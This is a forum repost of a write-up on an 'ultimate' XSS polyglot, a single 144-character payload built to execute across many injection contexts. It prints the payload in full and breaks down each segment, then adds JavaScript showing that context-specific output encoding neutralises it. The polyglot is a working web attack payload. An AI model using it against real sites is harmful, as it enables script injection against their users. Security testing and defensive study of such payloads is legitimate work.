Nytro Posted March 9, 2016

Unleashing an Ultimate XSS Polyglot
Ahmed Elsobky

Foreground:

When it comes to testing for cross-site scripting vulnerabilities (a.k.a. XSS), you’re generally faced with a variety of injection contexts, each of which requires you to alter your injection payload so it suits the specific context at hand. This can be too tedious and time consuming in most cases, but luckily, XSS polyglots can come in handy here to save us a lot of time and effort.

What is an XSS polyglot?

An XSS polyglot can be generally defined as any XSS vector that is executable within various injection contexts in its raw form.

So, what polyglot did you come up with?

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

Anatomy of the polyglot (in a nutshell):

jaVasCript:: A label in ECMAScript; a URI scheme otherwise.
/*-/*`/*\`/*'/*"/**/: A multi-line comment in ECMAScript; a literal-breaker sequence.
(/* */oNcliCk=alert() ): A tangled execution zone wrapped in invoking parentheses!
//%0D%0A%0D%0A//: A single-line comment in ECMAScript; a double-CRLF in HTTP response headers.
</stYle/</titLe/</teXtarEa/</scRipt/--!>: A sneaky HTML-tag-breaker sequence.
\x3csVg/<sVg/oNloAd=alert()//>\x3e: An innocuous svg element!!

Total length: 144 characters.

Link: https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
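As an added example (not part of the original post or the linked wiki), the JavaScript below shows the defensive side of the anatomy above: each breaker sequence in the polyglot is aimed at a specific output context (HTML tag/attribute, JS string literal, URL scheme), and context-specific output encoding removes exactly those characters. The encoders `encodeHtml`, `encodeJsString` and `safeHref` are illustrative functions written for this example, not a library API; the HTTP-header (CRLF) context is not covered here.

```javascript
// Constructed input: the 144-character polyglot from the post, as a JS string literal.
const POLYGLOT = 'jaVasCript:/*-/*`/*\\`/*\'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3e';

// Characters that let a value break out of an HTML tag or attribute value.
function hasHtmlBreakers(s) {
  return /[<>"'`]/.test(s);
}

// Characters/sequences that let a value break out of a JS string literal
// (quotes, backtick, line terminators, comment delimiters, a closing tag).
function hasJsBreakers(s) {
  return /["'`\r\n\u2028\u2029]|\/\*|\*\/|<\//.test(s);
}

// HTML body / attribute context: entity-encode every character that can close a
// tag, end a quoted attribute value, or start an unquoted attribute.
function encodeHtml(s) {
  return s.replace(/[&<>"'`\/=]/g, c => `&#x${c.charCodeAt(0).toString(16)};`);
}

// JS string context: \xHH / \uHHHH-encode everything outside [A-Za-z0-9], so no
// quote, backtick, comment delimiter or "</script" survives inside the literal.
function encodeJsString(s) {
  return s.replace(/[^A-Za-z0-9]/g, c => {
    const code = c.charCodeAt(0);
    return code < 256 ? '\\x' + code.toString(16).padStart(2, '0')
                      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// href/src context: allow relative URLs and http(s) only; any other scheme
// (e.g. the "jaVasCript:" label/scheme trick) is replaced by a harmless "#".
function safeHref(s) {
  // Browsers ignore ASCII control characters inside the scheme, so strip them first.
  const trimmed = s.trim().replace(/[\u0000-\u001f]/g, '');
  if (/^[a-z][a-z0-9+.-]*:/i.test(trimmed) && !/^https?:/i.test(trimmed)) return '#';
  return trimmed;
}

// Summarise whether the polyglot still carries breakers after each encoder.
function encodingReport(payload) {
  return {
    htmlStillBreaks: hasHtmlBreakers(encodeHtml(payload)),
    jsStillBreaks: hasJsBreakers(encodeJsString(payload)),
    href: safeHref(payload),
  };
}

console.log(encodingReport(POLYGLOT));
```

The report shows `htmlStillBreaks: false`, `jsStillBreaks: false` and `href: '#'`: the polyglot only works where a value is reflected into one of these contexts without the matching encoder.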